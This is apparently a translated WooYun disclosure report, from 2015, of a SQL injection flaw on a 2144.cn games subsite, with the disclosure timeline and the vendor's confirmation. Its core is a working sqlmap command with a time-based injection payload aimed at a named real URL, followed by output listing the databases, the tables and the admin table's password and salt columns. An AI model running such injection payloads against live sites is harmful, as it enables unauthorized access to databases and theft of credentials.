
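Vulnerability summary

Bug ID: wooyun-2015-0149618

Title: SQL injection on a 2144 Games subsite / sensitive tables such as admin, weixin and user exposed

Vendor: 2144.cn

Author: 冷白开。

Submitted: 2015-10-27 10:46

Fixed: 2015-12-11 11:02

Disclosed: 2015-12-11 11:02

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]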



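Vulnerability details

Disclosure status:

2015-10-27: Details reported to the vendor, awaiting vendor handling
2015-10-27: Vendor confirmed; details disclosed only to the vendor
2015-11-06: Details disclosed to core white hats and experts in related fields
2015-11-16: Details disclosed to regular white hats
2015-11-26: Details disclosed to intern white hats
2015-12-11: Details disclosed to the public

Brief description:

SQL injection on a 2144 Games subsite / sensitive tables such as admin, weixin and user exposed

Detailed description: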

sqlmap.py -u "http://rxxy.2144.cn/m/list?taxonomy_id=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/" --dbs


available databases [3]:
[*] information_schema
[*] sj_2144_cn
[*] test
Database: sj_2144_cn
[58 tables]
+--------------------+
| admin |
| article |
| attach |
| category |
| channel |
| collect_gl |
| collection |
| collection_data |
| config |
| coupon |
| coupon_code |
| data |
| data_category |
| data_info |
| editer |
| evaluation |
| feedback |
| friend_link |
| game |
| game_evaluation |
| game_flash |
| game_gl |
| game_news |
| game_shot |
| game_tg |
| game_tg_id |
| game_video |
| gl |
| gl_point |
| h5_category |
| html5 |
| jiong_game |
| jiong_game_reward |
| jump_url |
| keywords_link |
| news |
| prefecture |
| qr_event_log |
| recommend |
| rxxy_coupon |
| sjzs_event_log |
| sjzs_log |
| sort |
| special |
| special_category |
| special_tag |
| sy_coupon |
| sy_weixin |
| tag |
| taxonomy |
| user_coupon |
| video |
| video_tag |
| weixin_activity |
| weixin_game |
| weixin_h5_friends |
| weixin_h5rank_info |
| weixin_users |
+--------------------+
Database: sj_2144_cn
Table: admin
[11 columns]
+-------------+------------------+
| Column | Type |
+-------------+------------------+
| create_id | int(10) unsigned |
| create_time | datetime |
| data | text |
| id | int(10) unsigned |
| latest_ip | varchar(16) |
| latest_time | datetime |
| login_times | int(10) unsigned |
| name | varchar(128) |
| nick | varchar(128) |
| pwd | char(32) |
| salt | char(32) |
+-------------+------------------+
Database: sj_2144_cn
Table: admin
[17 entries]
+---------------+
| name |
+---------------+
+---------------+
Database: sj_2144_cn
Table: admin
[17 entries]
+----------------------------------+
| pwd |
+----------------------------------+
+----------------------------------+

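The encryption is too tough, and I don't have a cent to spend, so I can't crack it... oh ho ho ho ho

Proof of vulnerability:

See above.

Fix:

You know what to do.

Copyright notice: when reposting, please credit the source 冷白开。@WooYun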


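Vulnerability response

Vendor response:

Severity: Low

Vulnerability Rank: 5

Confirmed: 2015-10-27 11:00

Vendor reply:

Thank you very much for your support of 2144's security work.

Latest status:

None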